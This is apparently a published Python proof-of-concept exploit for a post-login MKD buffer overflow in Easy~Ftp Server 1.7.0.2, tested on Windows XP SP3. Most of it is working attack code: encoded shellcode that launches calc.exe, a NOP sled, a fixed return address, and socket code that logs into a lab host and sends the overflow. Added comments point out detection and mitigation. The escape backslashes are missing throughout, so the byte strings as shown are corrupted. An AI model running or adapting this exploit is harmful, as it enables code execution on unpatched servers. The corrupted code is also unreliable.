# Title : Easy~Ftp Server v1.7.0.2 Post-Authentication BoF
# Published : 2010-02-15
# Author : dookie
#!/usr/bin/python
# Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Author: dookie2000ca
# Date: 14/02/2010
# Found by: loneferret
# Date Found: 13/02/2010
# Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
# Tested on: Windows XP SP3 Professional
import socket
import sys
# msfpayload windows/exec cmd=calc.exe R | msfencode -b 'x00x0ax2fx5c' -e x86/shikata_ga_nai -t c
# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
# --- Proof-of-concept payload ------------------------------------------------
# Per the generator note above, this is a msfpayload windows/exec "calc.exe"
# payload, shikata_ga_nai-encoded, 228 bytes: on the vulnerable host it only
# launches the calculator. The byte values are reproduced exactly as the page
# shows them.
shellcode = ("xd9xccx31xc9xb1x33xd9x74x24xf4x5bxbax99xe4x93"
"x62x31x53x18x03x53x18x83xc3x9dx06x66x9ex75x4f"
"x89x5fx85x30x03xbaxb4x62x77xcexe4xb2xf3x82x04"
"x38x51x37x9fx4cx7ex38x28xfax58x77xa9xcax64xdb"
"x69x4cx19x26xbdxaex20xe9xb0xafx65x14x3axfdx3e"
"x52xe8x12x4ax26x30x12x9cx2cx08x6cx99xf3xfcxc6"
"xa0x23xacx5dxeaxdbxc7x3axcbxdax04x59x37x94x21"
"xaaxc3x27xe3xe2x2cx16xcbxa9x12x96xc6xb0x53x11"
"x38xc7xafx61xc5xd0x6bx1bx11x54x6exbbxd2xcex4a"
"x3dx37x88x19x31xfcxdex46x56x03x32xfdx62x88xb5"
"xd2xe2xcax91xf6xafx89xb8xafx15x7cxc4xb0xf2x21"
"x60xbax11x36x12xe1x7fxc9x96x9fx39xc9xa8x9fx69"
"xa1x99x14xe6xb6x25xffx42x48x6cxa2xe3xc0x29x36"
"xb6x8dxc9xecxf5xabx49x05x86x48x51x6cx83x15xd5"
"x9cxf9x06xb0xa2xaex27x91xc0x31xbbx79x29xd7x3b"
"x1bx35x1d")
# Author-labelled sled and filler regions of the MKD argument; the author
# sizes them at 10 and 30 repetitions respectively.
sled = "x90" * 10
filler = "x90" * 30
# Return-address overwrite. The author's note gives a fixed address inside
# WS2_32.DLL (71AB388B, "JMP EBP"). Depending on a fixed module address is
# what ties this PoC to the tested platform (Windows XP SP3, see header):
# module rebasing / ASLR on later Windows builds invalidates such addresses,
# which is itself a relevant mitigation.
eip = "x8Bx38xABx71" # 71AB388B JMP EBP WS2_32.DLL
trailer = "x43" * 48
# Oversized MKD argument: sled + shellcode + filler + eip + trailer. By the
# sizes the author notes (10 + 228 + 30 + 4 + 48) this is about 320 bytes, far
# longer than any plausible directory name. A post-login MKD (or similar
# command) argument of several hundred bytes is a usable detection signature
# for this class of FTP overflow.
evil = sled + shellcode + filler + eip + trailer
# --- Network delivery ---------------------------------------------------------
# Hardcoded lab target (private 192.168.x.x address) on the FTP control port.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.142',21))  # connect() returns None; 'connect' is never used
s.recv(1024)  # server banner
# Post-authentication bug: a valid account is required before the overflow is
# reachable. Restricting who can log in (no anonymous/guest accounts, strong
# credentials) narrows exposure; the overflow itself is only removed by
# patching or retiring the affected version.
s.send('USER dookiern')
s.recv(1024)
s.send('PASS dookiern')
s.recv(1024)
# The trigger: MKD with the oversized argument built above.
s.send('MKD ' + evil + 'rn')
s.recv(1024)
s.send('QUITrn')
# NOTE(review): `s.close` without parentheses is a bare method reference, not a
# call; the socket is only released when the process exits. Left as-is.
s.close